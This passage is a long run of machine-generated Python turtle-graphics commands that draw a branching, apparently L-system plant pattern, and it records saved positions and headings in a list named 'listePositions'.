pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5), ((233.52,276.81), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((233.52,276.81)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5), ((233.52,276.81), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((233.52,276.81)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5), ((249.52,276.81), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((249.52,276.81)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5), ((249.52,276.81), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((249.52,276.81)), setheading(0.0) ;
pu(), setposition((207.42,259.38)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((218.74,270.69), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.74,270.69)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((218.74,270.69), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.74,270.69)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.05,282.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.05,282.00)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5), ((246.05,282.00), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((246.05,282.00)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5), ((246.05,282.00), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((246.05,282.00)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5), ((260.83,288.13), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((260.83,288.13)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5), ((260.83,288.13), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((260.83,288.13)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5), ((272.15,299.44), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((272.15,299.44)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5), ((272.15,299.44), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((272.15,299.44)), setheading(45.0) ;
pu(), setposition((230.05,282.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0), ((236.17,296.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((236.17,296.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0), ((236.17,296.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((236.17,296.79)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0), ((247.49,308.10), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((247.49,308.10)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0), ((247.49,308.10), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((247.49,308.10)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0), ((262.27,314.22), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((262.27,314.22)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0), ((262.27,314.22), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((262.27,314.22)), setheading(22.5) ;
pu(), setposition((230.05,282.00)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((236.17,296.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((236.17,296.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((236.17,296.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((236.17,296.79)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((242.30,311.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((242.30,311.57)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0), ((257.08,317.69), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((257.08,317.69)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0), ((257.08,317.69), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((257.08,317.69)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0), ((268.39,329.01), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((268.39,329.01)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0), ((268.39,329.01), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((268.39,329.01)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0), ((274.51,343.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((274.51,343.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0), ((274.51,343.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((274.51,343.79)), setheading(67.5) ;
pu(), setposition((242.30,311.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5), ((242.30,327.57), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((242.30,327.57)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5), ((242.30,327.57), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((242.30,327.57)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5), ((248.42,342.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((248.42,342.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5), ((248.42,342.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((248.42,342.35)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5), ((259.73,353.66), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((259.73,353.66)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5), ((259.73,353.66), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((259.73,353.66)), setheading(45.0) ;
pu(), setposition((242.30,311.57)), setheading(67.5) ;
pu(), setposition((177.86,247.13)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,263.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,263.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,263.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,263.13)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,279.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,279.13)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5), ((189.17,290.45), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((189.17,290.45)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5), ((189.17,290.45), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((189.17,290.45)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5), ((195.29,305.23), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.29,305.23)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5), ((195.29,305.23), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.29,305.23)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5), ((195.29,321.23), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.29,321.23)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5), ((195.29,321.23), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.29,321.23)), setheading(90.0) ;
pu(), setposition((177.86,279.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0), ((171.74,293.91), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,293.91)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0), ((171.74,293.91), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,293.91)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0), ((171.74,309.91), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,309.91)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0), ((171.74,309.91), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,309.91)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0), ((177.86,324.70), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,324.70)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0), ((177.86,324.70), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,324.70)), setheading(67.5) ;
pu(), setposition((177.86,279.13)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((183.98,293.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.98,293.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((183.98,293.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.98,293.91)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((190.10,308.70)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((190.10,308.70)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0), ((204.89,314.82), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((204.89,314.82)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0), ((204.89,314.82), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((204.89,314.82)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0), ((216.20,326.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((216.20,326.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0), ((216.20,326.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((216.20,326.13)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0), ((222.32,340.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((222.32,340.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0), ((222.32,340.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((222.32,340.91)), setheading(67.5) ;
pu(), setposition((190.10,308.70)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5), ((190.10,324.70), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((190.10,324.70)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5), ((190.10,324.70), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((190.10,324.70)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5), ((196.23,339.48), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((196.23,339.48)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5), ((196.23,339.48), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((196.23,339.48)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5), ((207.54,350.79), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((207.54,350.79)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5), ((207.54,350.79), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((207.54,350.79)), setheading(45.0) ;
pu(), setposition((190.10,308.70)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((201.42,320.01), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((201.42,320.01)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((201.42,320.01), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((201.42,320.01)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((212.73,331.32)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((212.73,331.32)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5), ((228.73,331.32), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((228.73,331.32)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5), ((228.73,331.32), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((228.73,331.32)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5), ((243.51,337.45), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
